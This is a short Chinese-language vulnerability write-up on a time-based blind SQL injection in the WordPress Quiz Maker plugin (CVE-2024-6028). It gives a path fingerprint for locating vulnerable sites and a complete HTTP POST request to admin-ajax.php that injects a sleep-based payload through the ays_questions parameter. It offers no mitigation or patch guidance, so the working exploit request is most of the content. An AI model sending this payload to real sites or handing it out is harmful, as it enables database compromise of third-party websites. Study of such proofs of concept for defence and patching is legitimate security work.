WordPress Quiz Maker插件ays_questions存在SQL注入漏洞(CVE-2024-6028)
<font style="color:rgb(38, 38, 38);">一、漏洞简介</font>
<font style="color:rgb(38, 38, 38);">wordpress是一种自由和开放源代码的内容管理系统,基于php和mysql,使用wordpress,用户可以很容易地创建和维护个人或商业网站、博客、电子商务网站或应用程序,而无需深入了解编程语言或数据库管理。WordPress Quiz Maker插件ays_questions存在SQL注入漏洞</font>
<font style="color:rgb(38, 38, 38);">二、影响版本</font>
- <font style="color:rgb(38, 38, 38);">WordPress Quiz Maker</font>
<font style="color:rgb(38, 38, 38);">三、资产测绘</font>
"/wp-content/plugins/quiz-maker/"
四、漏洞复现
POST /wp-admin/admin-ajax.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
Connection: close
ays_quiz_id=1&ays_quiz_questions=1,2,3&quiz_id=1&ays_questions[ays-question-4)+or+sleep(if(1>0,3,0)]=&action=ays_finish_quiz